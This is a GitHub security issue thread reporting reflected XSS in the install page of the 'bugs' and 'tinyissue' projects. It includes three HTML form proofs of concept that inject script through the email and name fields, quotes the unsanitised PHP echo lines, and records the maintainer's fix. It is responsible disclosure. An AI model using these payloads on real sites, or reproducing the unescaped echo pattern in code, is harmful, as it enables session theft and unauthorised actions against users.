Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

[Security] multiple XSS in install/index.php of bugs and tinyissue #552

Closed
seongil-wi opened this issue Sep 9, 2021 · 4 comments
Closed

Comments

@seongil-wi
Copy link

seongil-wi commented Sep 9, 2021

Describe the bug
Reflected Cross-Site Scripting (XSS) may allow an attacker to execute JavaScript code in the context of the victim’s browser. This may lead to unauthorised actions being performed, unauthorised access to data, stealing of session information, denial of service, etc. An attacker needs to coerce a user into visiting a link with the XSS payload to be properly exploited against a victim.

To Reproduce
Steps to reproduce the behavior:

  1. Go to the installation page
  2. Complete the configuration including DB connection
  3. Access each page of these HTML files.

Exploit 1 - exploit email parameter

<html>
<form method="POST" action="http://[localhost]/bugs/install/index.php">
  <input name="email" value='test"/><script>alert(1)</script>'>
  <button>Send my greetings</button>
</form>
</html>

Exploit 2 - exploit first_name parameter

<html>
<form method="POST" action="http://[localhost]/bugs/install/index.php">
  <input name='first_name' value='test"/><script>alert(1)</script>'>
   <input name='email' value='hi'>
  <button>Send my greetings</button>
</form>
</html>

Exploit 3 - exploit last_name parameter

<html>
<form method="POST" action="http://[localhost]/bugs/install/index.php">
  <input name='last_name' value='test"/><script>alert(1)</script>'>
   <input name='email' value='hi'>
  <button>Send my greetings</button>
</form>
</html>
  1. Boom!

Screenshots

  • Attack result
    캡처

Where the Issue Occurred
The code below displays the user-controlled parameter first_name, last_name, and email without sufficient sanitization:

<input autocomplete="off" type="text" name="first_name" id="first_name" value="<?php echo $_POST['first_name']; ?>"/>

<input autocomplete="off" type="text" name="last_name" id="last_name" value="<?php echo $_POST['last_name']; ?>"/>

<input autocomplete="off" type="text" name="email" id="email" value="<?php echo $_POST['email']; ?>"/>

Note

Note that these multiple XSS vulnerabilities exist in the tinyissue as well as in the bugs repository here.

@Patriboom
Copy link
Collaborator

Thanks for that.
You trick works only if BUGS is not installed.
When installed, BUGS/install/index.php returns the following:

image

@seongil-wi
Copy link
Author

Yes, you are right. However, remember that XSS vulnerabilities that occur during the installation process are also vulnerabilities.
For example, in CVE-2021-37389, CVE-2014-9571, CVE-2020-26043, CVE-2020-18670, etc., you can see the vendors acknowledging that there are vulnerabilities.

@Patriboom
Copy link
Collaborator

Thanks again.

BUGS users are mostly local users, as you prompt in your example: http://localhost/... they manage their own security.
Anyway, I'll reinforce security processes according to your advice.

@Patriboom
Copy link
Collaborator

Install process updated.
Thanks

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

2 participants